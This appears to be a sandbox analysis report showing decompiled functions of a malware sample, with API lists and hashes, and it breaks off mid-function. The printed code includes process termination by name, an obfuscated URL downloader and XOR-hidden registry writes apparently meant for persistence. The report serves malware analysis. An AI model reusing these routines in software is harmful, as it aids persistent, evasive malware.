Instruction ID: 5fa89c65d2bd546e49a28d7b2dc4abedb38f27a5a8a363e2ed214f93a274e2e1
Opcode Fuzzy Hash: 53bf7508d7b07ad1f9dcb9ed2ab1349a8b5af6a17fdc49fdd59d2b52f2b1547a
Instruction Fuzzy Hash: 6A21D531A45225ABDB319A249C84B6A77D8EF467B2F2403E1EC05B72D1DA70ED0886E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B49907, Relevance: 10.6, APIs: 7, Instructions: 67
processCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00B49907(void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				signed int _v16;
				char _v280;
				long _v308;
				void* _v312;
				void* _v316;
				signed int _t11;
				int _t15;
				signed int _t16;
				int _t17;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t28;
				void* _t30;
				void* _t34;
				signed int _t35;

				_t37 = (_t35 & 0xfffffff8) - 0x130;
				_t11 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t11 ^ (_t35 & 0xfffffff8) - 0x00000130;
				_t30 = CreateToolhelp32Snapshot(0xf, 0);
				_v312 = 0x128;
				_t15 = Process32First(_t30,  &_v312);
				L12:
				while(_t15 != 0) {
					_t24 = _a4;
					_t16 =  &_v280;
					while(1) {
						_t27 =  *_t16;
						if(_t27 !=  *_t24) {
							break;
						}
						if(_t27 == 0) {
							L6:
							_t17 = 0;
							L8:
							if(_t17 == 0) {
								_t34 = OpenProcess(1, _t17, _v308);
								if(_t34 != 0) {
									TerminateProcess(_t34, 9);
									CloseHandle(_t34);
								}
							}
							_t15 = Process32Next(_t30,  &_v316);
							goto L12;
						}
						_t28 =  *((intOrPtr*)(_t16 + 1));
						_t7 = _t24 + 1; // 0xded00528
						if(_t28 !=  *_t7) {
							break;
						}
						_t16 = _t16 + 2;
						_t24 = _t24 + 2;
						if(_t28 != 0) {
							continue;
						}
						goto L6;
					}
					asm("sbb eax, eax");
					_t17 = _t16 | 0x00000001;
					goto L8;
				}
				CloseHandle(_t30);
				return E00B4AE43(_v16 ^ _t37);
			}

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00B49927
Process32First.KERNEL32(00000000,00000128), ref: 00B4993D
OpenProcess.KERNEL32(00000001,?,?), ref: 00B4997C
TerminateProcess.KERNEL32(00000000,00000009), ref: 00B4998B
CloseHandle.KERNEL32(00000000), ref: 00B49992
Process32Next.KERNEL32 ref: 00B4999E
CloseHandle.KERNEL32(00000000), ref: 00B499A9

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: f18a3bde4e162b3d68ae9bcdd3ae92b45a2bf6541f9ade84cd95a052611f858d
Instruction ID: 77a263f29e397150c92deeb4dd5dd81ea7e17c4763331a2b9618210a2b7894de
Opcode Fuzzy Hash: f18a3bde4e162b3d68ae9bcdd3ae92b45a2bf6541f9ade84cd95a052611f858d
Instruction Fuzzy Hash: 8711D33124C241AFD7219B20CC59BFB7BE9EB46718F00049DF985C7290EF758A09D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B5BC56, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5BC56(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00B5B9A0(_t45, 7);
					E00B5B9A0(_t45 + 0x1c, 7);
					E00B5B9A0(_t45 + 0x38, 0xc);
					E00B5B9A0(_t45 + 0x68, 0xc);
					E00B5B9A0(_t45 + 0x98, 2);
					E00B564B8( *((intOrPtr*)(_t45 + 0xa0)));
					E00B564B8( *((intOrPtr*)(_t45 + 0xa4)));
					E00B564B8( *((intOrPtr*)(_t45 + 0xa8)));
					E00B5B9A0(_t45 + 0xb4, 7);
					E00B5B9A0(_t45 + 0xd0, 7);
					E00B5B9A0(_t45 + 0xec, 0xc);
					E00B5B9A0(_t45 + 0x11c, 0xc);
					E00B5B9A0(_t45 + 0x14c, 2);
					E00B564B8( *((intOrPtr*)(_t45 + 0x154)));
					E00B564B8( *((intOrPtr*)(_t45 + 0x158)));
					E00B564B8( *((intOrPtr*)(_t45 + 0x15c)));
					return E00B564B8( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 00B5B9A0: _free.LIBCMT ref: 00B5B9C5

_free.LIBCMT ref: 00B5BCA4

Part of subcall function 00B564B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B5BCAF
_free.LIBCMT ref: 00B5BCBA
_free.LIBCMT ref: 00B5BD0E
_free.LIBCMT ref: 00B5BD19
_free.LIBCMT ref: 00B5BD24
_free.LIBCMT ref: 00B5BD2F

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ad1b06e11366af490d37ed3c7e7652c03bfb021593f371a598e2c90364fcba2b
Instruction ID: a9b13363b1f11350bdbe8723ab6f40f2dab4df7c40ca7f82e609993bc910898b
Opcode Fuzzy Hash: ad1b06e11366af490d37ed3c7e7652c03bfb021593f371a598e2c90364fcba2b
Instruction Fuzzy Hash: 7F11F171550B08AAD960BBB0CC47FCB77DC9F04702FC048D5BB99A61A2DB69B5094661

Uniqueness

Uniqueness Score: -1.00%

Function 00B622B6, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B622B6(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				intOrPtr _t176;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t278;
				long _t279;
				struct _OVERLAPPED* _t280;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t289;
				long _t290;
				long _t291;
				signed int _t292;
				intOrPtr _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t172 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t172 ^ _t294;
				_t174 = _a8;
				_t263 = _a12;
				_t282 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_t176 =  *((intOrPtr*)(0xb6a6c8 + _t246 * 4));
				_v80 = _t282;
				_t10 = _t176 + 0x18; // 0x8458b01
				_t284 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t282 + _t10));
				_v104 = _t284;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E00B519CE( &_v72, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t284) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t286 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0xb6a6c8 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t212 = _t186 + 0x2e + _t265;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t278 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0xb691d8)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t278;
							if(_t258 > _t278) {
								__eflags = _t278;
								if(_t278 <= 0) {
									goto L44;
								} else {
									_t290 = _v40;
									do {
										_t266 = _t265 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t290));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0xb6a6c8 + _v84 * 4)) + 0x2e)) = _t216;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									goto L43;
								}
							} else {
								_t279 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t279;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0xb691d8)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t278) {
								__eflags = _t278;
								if(_t278 > 0) {
									_t291 = _v40;
									do {
										_t268 = _t265 + _t243 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t291));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0xb6a6c8 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									L43:
									_t286 = _v92;
								}
								L44:
								_t289 = _t286 + _t278;
								__eflags = _t289;
								L45:
								__eflags = _v60;
								_v92 = _t289;
							} else {
								_t269 = _t243;
								if(_t256 > 0) {
									_t293 = _v108;
									do {
										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t229 = _v52;
								}
								_t279 = _v40;
								if(_t229 > 0) {
									E00B4D670( &_v16 + _t256, _t279, _v52);
									_t256 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t280 = _t243;
									_t292 = _v80;
									do {
										_t262 = _t292 + _t280;
										_t280 =  &(_t280->Internal);
										 *(_t262 +  *((intOrPtr*)(0xb6a6c8 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t280 < _t270);
									_t279 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E00B63A20(_t260);
								_t296 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t279 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t193 = E00B5A975(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t286 = _v88 - _v112 + _t275;
											_v92 = _t286;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t286 = _t286 + 1;
															_v92 = _t286;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t188 = E00B55632();
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t202 = _t275 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0xb6a6c8 + _t271 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0xb6a6c8 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0xb6a6c8 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t286 + 1;
									goto L45;
								} else {
									_t206 = E00B5FAC5( &_v76, _t275, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E00B5FAC5();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t294;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00B4AE43(_v8 ^ _t294);
			}

APIs

GetConsoleCP.KERNEL32(8304488B,00B513E1,00000000), ref: 00B622FE
__fassign.LIBCMT ref: 00B624DD
__fassign.LIBCMT ref: 00B624FA
WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B62542
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B62582
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B6262E

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 0b8a90aaa309601efd345597b4daf3f7f6fbbc387c5d302a4baf259f79a7a756
Instruction ID: 8cfb461868226d8d41bac1ca454f3ed6a3c9d9291a317b104be7f8a4350892eb
Opcode Fuzzy Hash: 0b8a90aaa309601efd345597b4daf3f7f6fbbc387c5d302a4baf259f79a7a756
Instruction Fuzzy Hash: 59D19971D016589FDF15CFA8C8809EDBBF5FF48304F2801AAE856BB352D635AA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B489B2, Relevance: 9.1, APIs: 6, Instructions: 108
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00B489B2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __ebp, char* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v72;
				char _v2005;
				intOrPtr _v2008;
				void _v2048;
				char _v2064;
				char _v2120;
				intOrPtr _v2124;
				void* _v2132;
				long _v2176;
				intOrPtr _v2188;
				void* _v2192;
				signed int _t26;
				char* _t51;
				char* _t53;
				void* _t60;
				char* _t63;
				void* _t64;
				void _t68;
				signed int _t70;

				_t70 =  &_v2132;
				_t26 =  *0xb69014; // 0xce6f0fb5
				_v4 = _t26 ^ _t70;
				asm("movaps xmm0, [0xb3dc00]");
				asm("movups [esp+0xc], xmm0");
				asm("movaps xmm0, [0xb3dd50]");
				_t51 = 0;
				asm("movups [esp+0x20], xmm0");
				_t53 = 0;
				_v2124 = _a8;
				asm("movaps xmm0, [0xb3dd80]");
				asm("movups [esp+0x30], xmm0");
				asm("movaps xmm0, [0xb3dd70]");
				_t68 = 0;
				asm("movups [esp+0x44], xmm0");
				asm("movaps xmm0, [0xb3df10]");
				_t63 = _a4;
				asm("movups [esp+0x58], xmm0");
				asm("movaps xmm0, [0xb3df20]");
				asm("movups [esp+0x6c], xmm0");
				_v2132 = 0;
				asm("movaps xmm0, [0xb3df00]");
				asm("movups [esp+0x7c], xmm0");
				_v2008 = 0x84829e;
				do {
					_t7 = _t53 + 0x40; // 0x40
					 *(_t70 + _t53 + 0x1c) =  *(_t70 + _t53 + 0x1c) ^ _t7;
					_t53 = _t53 + 1;
				} while (_t53 < 0x73);
				_v2005 = 0;
				_t60 = InternetOpenA( &_v2120, 0, 0, 0, 0);
				if(_t60 != 0) {
					_t64 = InternetOpenUrlA(_t60, _t63, 0, 0, 0x84000000, 0);
					__eflags = _t64;
					if(__eflags != 0) {
						do {
							InternetReadFile(_t64,  &_v2048, 0x7d0,  &_v2176);
							_push(_v2192 + _t68);
							_v2188 = E00B4B0B6(__edx, __eflags);
							E00B4D670(_t38, _t51, _t68);
							E00B4D670(_v2188 + _t68,  &_v2064, _v2192);
							L00B4AE54(_t51);
							_t68 = _v2192 + _t68;
							_t70 = _t70 + 0x20;
							__eflags = _v2192;
							_t51 = _v2188;
						} while (__eflags != 0);
						InternetCloseHandle(_t64);
						InternetCloseHandle(_t60);
						 *_v2192 = _t68;
					} else {
						InternetCloseHandle(_t60);
						goto L3;
					}
				} else {
					L3:
				}
				return E00B4AE43(_v72 ^ _t70);
			}

APIs

InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00B48A62
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000000,00000000), ref: 00B48A7F
InternetCloseHandle.WININET(00000000), ref: 00B48A8C
InternetReadFile.WININET(00000000,?,000007D0,?), ref: 00B48AA7
InternetCloseHandle.WININET(00000000), ref: 00B48AFC
InternetCloseHandle.WININET(00000000), ref: 00B48AFF

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$Open$FileRead
String ID:
API String ID: 4294395943-0
Opcode ID: d32641e5fdda7fb71abab7e880f285184320a76a822168643e32401bacef95a4
Instruction ID: d9a69031cbca952dc9939bad59f4c877ba666d513c67f077c900a5cd4f4e1321
Opcode Fuzzy Hash: d32641e5fdda7fb71abab7e880f285184320a76a822168643e32401bacef95a4
Instruction Fuzzy Hash: 264172719087449BD311DF29DC80AAFF7E8FF99308F01591DF98853121EF74AA948B62

Uniqueness

Uniqueness Score: -1.00%

Function 00B49B90, Relevance: 9.1, APIs: 6, Instructions: 99
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B49B90(void* __ebx, void* __esi, char* _a4, char* _a8) {
				signed int _v8;
				char _v11;
				short _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v56;
				void* _v60;
				char* _v64;
				signed int _t37;
				char _t43;
				char _t50;
				char* _t55;
				int _t58;
				char* _t59;
				int _t61;
				char* _t62;
				char* _t67;
				char* _t69;
				char* _t71;
				signed int _t73;

				_t37 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t37 ^ _t73;
				asm("movaps xmm0, [0xb3dbe0]");
				_t55 = _a8;
				_t58 = 0;
				asm("movups [ebp-0x34], xmm0");
				asm("movaps xmm0, [0xb3ddb0]");
				_t71 = _a4;
				_v64 = _t55;
				asm("movups [ebp-0x24], xmm0");
				_v24 = 0x634150e;
				_v20 = 0x80f1616;
				_v16 = 0x1e383506;
				_v12 = 2;
				do {
					_t9 = _t58 + 0x40; // 0x40
					 *(_t73 + _t58 - 0x34) =  *(_t73 + _t58 - 0x34) ^ _t9;
					_t58 = _t58 + 1;
				} while (_t58 < 0x2d);
				_v11 = 0;
				RegOpenKeyExA(0x80000001,  &_v56, 0, 2,  &_v60);
				_t59 = _t71;
				_t17 =  &(_t59[1]); // 0x1
				_t67 = _t17;
				do {
					_t43 =  *_t59;
					_t59 =  &(_t59[1]);
				} while (_t43 != 0);
				RegSetValueExA(_v60, _t55, 0, 1, _t71, _t59 - _t67);
				RegCloseKey(_v60);
				asm("movaps xmm0, [0xb3dbd0]");
				asm("movups [ebp-0x34], xmm0");
				_t61 = 0;
				_v24 = 0x634150e;
				asm("movaps xmm0, [0xb3ddb0]");
				asm("movups [ebp-0x24], xmm0");
				_v20 = 0x80f1616;
				_v16 = 0x1e383506;
				_v12 = 2;
				do {
					_t24 = _t61 + 0x40; // 0x40
					 *(_t73 + _t61 - 0x34) =  *(_t73 + _t61 - 0x34) ^ _t24;
					_t61 = _t61 + 1;
				} while (_t61 < 0x2d);
				_v11 = 0;
				RegOpenKeyExA(0x80000002,  &_v56, 0, 2,  &_v60);
				_t62 = _t71;
				_t32 =  &(_t62[1]); // 0x1
				_t69 = _t32;
				do {
					_t50 =  *_t62;
					_t62 =  &(_t62[1]);
				} while (_t50 != 0);
				RegSetValueExA(_v60, _v64, 0, 1, _t71, _t62 - _t69);
				RegCloseKey(_v60);
				return E00B4AE43(_v8 ^ _t73);
			}

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000002,?,00000000,00000000), ref: 00B49C00
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49C24
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49C29
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00000002,?,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49C84
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000001,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49CA4
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00B492BD), ref: 00B49CA9

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 203c0cd6b28aad78152a595b419d7540205ae0e3850e2b5014343d69167d114e
Instruction ID: 8aa777a3e5d85021cfd53395fb2881dfead91ff96be0ce980c49b1a1bc126219
Opcode Fuzzy Hash: 203c0cd6b28aad78152a595b419d7540205ae0e3850e2b5014343d69167d114e
Instruction Fuzzy Hash: F8418074905248BAEB05CFA4ED84AFDBBB9EF49308F108158F94167262EB715A85CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00B4F519, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00B4F519(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				long _t26;
				void* _t29;

				if( *0xb69080 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E00B4F844(__eflags,  *0xb69080);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00B4F87F(__eflags,  *0xb69080, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t29 = E00B55627();
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00B4F87F(__eflags,  *0xb69080, 0);
								} else {
									__eflags = E00B4F87F(__eflags,  *0xb69080, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00B50985(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

GetLastError.KERNEL32(?,?,00B4F510,00B4D425), ref: 00B4F527
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B4F535
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B4F54E
SetLastError.KERNEL32(00000000,?,00B4F510,00B4D425), ref: 00B4F5A0

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 85f00b6f552191a8d9d7049a761ff27dda7eafd80fb9c6d3cd0f14d06bc33830
Instruction ID: 477be4285c19c7236f54fa5ee32f69955c9d4f40dd129f8810ddeff016e5474a
Opcode Fuzzy Hash: 85f00b6f552191a8d9d7049a761ff27dda7eafd80fb9c6d3cd0f14d06bc33830
Instruction Fuzzy Hash: 2701FC3220D3135EAF142B757C85ABA27E8DB6577572003BAF414870F1EF654D00B140

Uniqueness

Uniqueness Score: -1.00%

Function 00B456CF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100
processCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00B456CF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v9;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v36;
				char _v40;
				struct _PROCESS_INFORMATION _v56;
				struct _STARTUPINFOA _v132;
				signed int _t29;
				void _t34;
				void _t35;
				void* _t38;
				CHAR* _t48;
				void* _t50;
				signed int _t52;
				struct _SECURITY_ATTRIBUTES* _t57;
				void* _t60;
				signed int _t61;
				void* _t64;
				void* _t71;
				long _t72;
				signed int _t73;

				_t29 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t29 ^ _t73;
				_t48 = E00B509A2();
				__imp__SHGetFolderPathA(0, 0x26, 0, 0, _t48, 0x104);
				asm("movaps xmm0, [0xb3ddf0]");
				_t50 = 0;
				asm("movups [ebp-0x24], xmm0");
				asm("movaps xmm0, [0xb3daa0]");
				asm("movups [ebp-0x14], xmm0");
				do {
					_t2 = _t50 + 0x40; // 0x40
					 *(_t73 + _t50 - 0x24) =  *(_t73 + _t50 - 0x24) ^ _t2;
					_t50 = _t50 + 1;
				} while (_t50 < 0x1f);
				_t60 =  &_v40;
				_v9 = 0;
				_t71 = _t60;
				do {
					_t34 =  *_t60;
					_t60 = _t60 + 1;
				} while (_t34 != 0);
				_t61 = _t60 - _t71;
				_t9 = _t48 - 1; // -1
				_t64 = _t9;
				do {
					_t35 =  *(_t64 + 1);
